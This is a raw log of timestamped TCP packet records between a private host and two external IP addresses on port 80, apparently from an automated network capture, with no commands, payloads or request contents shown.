Jul 2, 2024 00:05:08.026685953 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026696920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026707888 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026717901 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026726961 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.026729107 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026740074 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026741982 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.026750088 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026758909 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.026760101 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026802063 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.026802063 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.026812077 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.026830912 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026842117 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026851892 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026861906 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026871920 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026882887 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026891947 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026901960 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026906967 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.026906967 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.026916981 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026926994 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.026932001 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.026932001 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.026938915 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026951075 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.026957035 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.026979923 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.026979923 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.026984930 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.027005911 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.027496099 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.027514935 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.027524948 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.027538061 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.027550936 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.027550936 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.027570963 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.027640104 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.027775049 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.027785063 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.027795076 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.027805090 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.027813911 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.027816057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.027828932 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.027829885 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.027839899 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.027851105 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.027861118 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.027870893 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.027870893 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.027870893 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.027882099 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.027894020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.027904987 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.027908087 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.027911901 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.027915955 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.027941942 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.027942896 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.027955055 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.028371096 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.028382063 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.028390884 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.028404951 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.028419971 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.028430939 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.028438091 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.028438091 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.028440952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.028445959 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.028451920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.028461933 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.028472900 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.028491974 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.028502941 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.028505087 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.028511047 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.028513908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.028525114 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.028534889 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.028539896 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.028546095 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.028557062 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.028564930 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.028568983 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.028578997 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.028594017 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.028615952 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.029165983 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.029176950 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.029187918 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029197931 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029208899 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.029218912 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.029225111 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.029225111 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.029230118 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029239893 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029244900 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.029254913 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029264927 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029279947 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029297113 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029297113 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.029298067 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.029309034 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029320002 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029330015 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029335022 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.029335022 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.029340029 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029350996 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029364109 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029365063 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.029373884 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029383898 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.029385090 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029397964 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029409885 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029411077 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.029421091 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.029427052 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.029469013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.029469013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.030076027 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030086994 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030097008 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030107021 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030117035 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030127048 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.030132055 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.030132055 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.030137062 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.030148029 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.030162096 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.030172110 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030177116 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030181885 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.030181885 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.030181885 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.030203104 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.030205965 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.030205965 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.030214071 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.030216932 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030227900 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030237913 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030247927 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030251026 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.030251026 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.030255079 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.030258894 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030268908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030280113 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030289888 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030301094 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030311108 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.030311108 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.030360937 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.030360937 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.031088114 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031100035 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031109095 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.031119108 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.031128883 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.031138897 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.031147957 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.031150103 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.031150103 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.031153917 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.031160116 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.031176090 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031186104 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031197071 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031205893 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031205893 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.031205893 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.031217098 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031233072 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031240940 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.031240940 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.031244993 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031256914 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031259060 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.031269073 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031280041 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031290054 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031294107 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.031302929 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031313896 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031322956 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031333923 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031343937 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.031361103 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.031361103 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.031394005 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.032016039 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.032027006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.032037020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.032047987 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.032058001 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.032064915 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.032068968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.032079935 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.032093048 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.032097101 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.032104015 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.032114983 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.032124043 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032135010 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032165051 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.032165051 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.032174110 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032183886 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032195091 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032206059 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032212973 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.032212973 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.032216072 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032227039 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032237053 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032246113 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032247066 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.032257080 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032267094 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032277107 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032291889 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.032327890 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.032346010 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.032960892 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032973051 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032982111 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.032993078 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.033001900 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.033010960 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.033013105 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.033024073 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.033035040 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.033046007 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033051014 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.033056021 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033066988 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033082962 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033085108 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.033085108 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.033093929 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033097029 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.033104897 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033111095 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.033118963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033129930 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033138990 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033149004 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033149958 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.033149958 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.033159971 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033169985 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033180952 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033190966 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033193111 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.033201933 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033236980 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.033246994 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.033988953 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.033999920 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.034009933 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.034019947 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.034029961 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.034040928 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.034051895 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.034056902 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.034064054 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.034074068 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.034084082 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.034094095 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.034101963 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.034104109 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034116030 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.034125090 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034137011 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034146070 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034154892 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.034159899 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034169912 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034173965 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.034181118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034192085 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034194946 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.034203053 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034213066 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034223080 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034233093 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034243107 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034245014 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.034245014 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.034298897 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.034298897 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.034946918 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034959078 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034969091 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034979105 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.034990072 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035000086 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035010099 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035012960 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.035012960 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.035027981 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035038948 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035048962 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035053968 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035058022 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.035064936 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035074949 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035084963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035094976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035104990 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035104990 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.035115004 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035125017 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035135031 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035145998 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035155058 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035156965 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.035156965 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.035166025 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035175085 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.035196066 CEST	49716	80	192.168.2.6	77.105.133.27
